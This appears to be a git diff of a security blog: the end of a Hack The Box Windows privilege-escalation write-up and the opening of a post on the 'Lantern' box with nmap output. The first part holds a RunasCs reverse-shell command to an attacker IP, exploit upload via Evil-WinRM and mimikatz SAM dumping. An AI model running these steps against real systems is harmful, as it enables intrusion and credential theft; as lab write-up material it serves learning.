+```
+
+You can put the paylaod/reverseShell there or make a path in `c:\windows\Temp`{: .filepath} and make a folder 'test' and inside upload a payload.exe for get shell as `NT/Authority System`
+
+Create a new project using the Desktop Development C++ Kit and right click on 'Expl' Solution and then a box will appear with the add option and select the Existing Project.
+
+tip: I missed hours why dont works the Expl.exe i found the "`Debug`" for compilated need to choose to "`Release`" for works the Expl.exe and get the reverse shell.
+
+
+
+Build Solution for compiling/building for get the ouput Expl.exe and upload via Evil-winrm
+
+
+
+For execute the Expl.exe we need to use RunasCs.exe via Evil-winrm but before to execute the expl.exe we go to generate a reverse shell with RunasCs.exe
+
+```bash
+./RunasCs.exe Emily 12345678 powershell.exe -r 10.10.16.45:9090
+```
+
+Instant we trying start the service "msiserivce".
+
+```text
+Shell with RunasCs.exe
+PS>
+net start msiservice
+```
+
+```text
+Shell with Evil-winrm
+PS>
+./RunasCs.exe Emily 12345678 "C:\Users\Emily\Documents\Expl.exe"
+```
+
+With msfconsole listening get the shell as Administrator
+
+
+
+Rooted
+
+We can upload mimikatz.exe for get the hash and login with evil-winrm
+
+```bash
+PS> mimikatz.exe
+mimikatz#: lsadumo::sam
+```
+
+
+
+
+
diff --git a/_posts/2024-08-23-lantern.md b/_posts/2024-08-23-lantern.md
new file mode 100644
index 0000000..7b2d95a
--- /dev/null
+++ b/_posts/2024-08-23-lantern.md
@@ -0,0 +1,536 @@
+---
+title: HTB - Lantern
+date: 2024-08-23 00:00:00 +8000
+categories: [hackthebox , Compiled]
+tags: [HackTheBox, SSRF, Skipper Proxy, Blazer, API, Decompile, DLL, File Disclosure, LFI, RCE, Procmon]
+image:
+ path: /assets/img/post/Lantern/Lantern.png
+ lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
+ alt: Hack the Box - Lantern.
+---
+
+## Box Info
+
+| Name | Lantern |
+| :-------------------- | ---------------: |
+| Release Date | 23 Aug, 2024 |
+| OS | Windows |
+| Rated Difficulty | Hard |
+
+ ```bash
+$ sudo nmap -p- --open --min-rate 5000 -n -sS -vvv 10.10.11.29 -oG allPorts
+
+[sudo] password for racc0x:
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 13:25 EDT
+Initiating Ping Scan at 13:25
+Scanning 10.10.11.29 [4 ports]
+Completed Ping Scan at 13:25, 0.09s elapsed (1 total hosts)
+Initiating SYN Stealth Scan at 13:25
+Scanning 10.10.11.29 [65535 ports]
+Discovered open port 80/tcp on 10.10.11.29
+Discovered open port 22/tcp on 10.10.11.29
+Discovered open port 3000/tcp on 10.10.11.29
+Completed SYN Stealth Scan at 13:25, 13.43s elapsed (65535 total ports)
+Nmap scan report for 10.10.11.29
+Host is up, received echo-reply ttl 63 (0.17s latency).
+Scanned at 2024-08-20 13:25:24 EDT for 13s
+Not shown: 65532 closed tcp ports (reset)
+PORT STATE SERVICE REASON
+22/tcp open ssh syn-ack ttl 63
+80/tcp open http syn-ack ttl 63
+3000/tcp open ppp syn-ack ttl 63
+22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
+|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
+80/tcp open http Skipper Proxy
+|_http-title: Did not follow redirect to http://lantern.htb/
+| fingerprint-strings:
+| FourOhFourRequest:
+| HTTP/1.0 404 Not Found
+| Content-Length: 207
+| Content-Type: text/html; charset=utf-8
+| Date: Tue, 20 Aug 2024 17:26:17 GMT
+| Server: Skipper Proxy
+|
+|
+| 404 Not Found
+|
Not Found
+|
The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.